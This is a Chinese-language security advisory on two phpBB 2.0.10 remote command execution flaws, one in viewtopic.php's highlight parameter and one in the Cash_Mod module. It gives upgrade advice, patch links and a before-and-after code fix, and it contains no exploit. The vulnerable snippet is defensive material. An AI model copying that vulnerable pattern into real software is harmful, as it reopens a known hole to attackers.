一、簡介:
PHPBB是一套免費的網頁論壇套件。這個軟體套件最近被發現兩個嚴重的弱點,並且技服中心監控到已經有入侵者使用這些弱點在進行攻擊。這些弱點都可以讓入侵者執行任意的系統指令,進而安裝後門取得整個系統的控制權。這兩個弱點分別為:PHPBB的highlight漏洞、以及PHPBB的admin_cash漏洞。
二、技術細節:
a.PHPBB的highlight漏洞
phpBB 2.0.10 的版本,其viewtopic.php程式對於highlight變數使用錯誤的函數來處理字串判斷,導致惡意的使用者可以使用highlight變數來下達系統指令,進而執行任意程式。
b.PHPBB的admin_cash漏洞
PHPBB 2.0.10以前的版本(包含2.0.10)其Cash_Mod模組存在輸入驗證上的弱點,可以讓惡意的使用者任意插入PHP檔案。並可以透過這一個PHP檔案來執行任意的系統檔案。
三、解決方法:
a.PHPBB的highlight漏洞
1.將PHPBB更新到2.0.11的版本。
2.若無法立即更新版本若,建議使用以下的方式修改程式碼來修正此一弱點。
找到以下的程式碼\r
代碼: 選擇全部
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
for($i = 0; $i < sizeof($words); $i++)
{
將之改成以下的程式碼
代碼: 選擇全部
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));
for($i = 0; $i < sizeof($words); $i++)
{
b.PHPBB的admin_cash漏洞
1.將PHPBB更新到2.0.11的版本。
2.若無法立即更新版本若,建議至以下的網址下載修正檔,並將修正檔安裝起來。
phpBB Group phpBB 1.0 .0:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 1.2 .0:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 1.2.1:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 1.4 .0:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 1.4.1:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 1.4.2:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 1.4.4:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0 .0:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0 RC4:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0 RC3:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0 RC2:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0 RC1:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0 Beta 1:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.1:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.2:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.3:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.4:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.5:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.6 d:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.6 c:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.6:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.7 a:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.7:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.8 a:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.8:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.9:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
phpBB Group phpBB 2.0.10:
Xore Upgrade CashMod222.zip
http://www.phpbb.com/phpBB/catdb.php?mo ... &id=539420
四、參考資料:
http://securityfocus.com/bid/11701/ \r
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513